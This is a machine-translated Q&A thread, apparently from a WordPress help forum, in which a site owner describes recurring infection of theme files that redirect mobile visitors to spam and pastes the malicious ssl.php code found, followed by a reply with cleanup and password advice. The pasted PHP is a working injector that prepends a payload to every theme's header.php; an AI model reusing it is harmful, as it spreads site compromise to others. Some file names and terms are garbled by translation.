注意到网站根文件夹上有一些不需要的文件,并将其删除。我找到了那个标题。php文件包含一些恶意代码,这些代码只能重定向到移动浏览器上的垃圾邮件网站。
当这些文件存在时。htaccess pretty permalinks不起作用。
我已经更改了Cpanel、FTP密码。已删除以下列出的不需要的文件。已扫描所有文件和文件夹。
在干净地安装wordpress和插件之后,会重复添加这些文件。
服务器:使用Cpanel/FileZilla的共享主机/linux服务器文件传输
如何阻止这些重复的攻击?
恶意脚本列表。
ssl。php有以下代码
if (file_exists("wp-content"))
{
if (file_exists("wp-content/themes"))
{
$dirs = scandir("wp-content/themes");
foreach ($dirs as $dir)
{
if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== ".."))
{
if (file_exists("wp-content/themes/$dir/header.php"))
{
$file = fopen("wp-content/themes/".$dir."/header.php", "r");
$buffer = fread($file, filesize("wp-content/themes/".$dir."/header.php"));
fclose($file);
if (eregi(\'ba9hus.in\', $buffer)==0)
{
$in = fopen("wp-content/themes/".$dir."/header.php", "w");
fwrite($in, $code);
fwrite($in, $buffer);
fclose($in);
/*
$in = fopen("wp-content/themes/$dir/header.php", "a");
fwrite($in, $code);
fclose($in);
*/
}
}
}
}
}
}
ssl。php可湿性粉剂ssl。php可湿性粉剂ssl。zip新闻解析器。班php
SO网友:Rick Hellewell
检查所有WP文件夹的权限。检查htaccess文件。删除整个托管区域中的所有未知文件。(小心。)更改所有托管密码(包括FTP帐户;删除任何您不知道的密码)。强密码!
重新安装WP(从您的管理面板,更新)。重新安装所有主题(停用、卸载、重新安装、重新激活)。插件也是如此(尽管header.php可能在您的主题文件中)。
谷歌上有很多关于恢复被黑客入侵的WP安装的建议(按“去年”过滤你的搜索)。
您还可以在您的托管帐户上的一个单独文件夹中安装一个全新的WP。这里需要做更多的工作,因为您需要调整域设置,复制数据(工具,导出,然后工具,导入),并重新执行所有主题和插件设置。
对您最近安装的任何插件/主题都要小心。确保所有内容都是最新的(WP、主题、插件)。还要检查您的本地计算机是否存在奇怪之处(如更新本地操作系统和应用程序)。
更改托管帐户上的所有密码(托管帐户、WP、数据库、FTP、电子邮件)。并在本地计算机上。
祝你好运
个人意见如下
(顺便说一句,几年前我停止使用FileZilla,因为我发现他们将凭据(用户/密码)存储在一个可以在本地PC上轻松访问的纯文本文件中。从那以后就没有使用过,不知道他们是否修复了它;当时他们并不认为这是vuln。现在就使用WinSCP吧。你的里程可能会有所不同。)
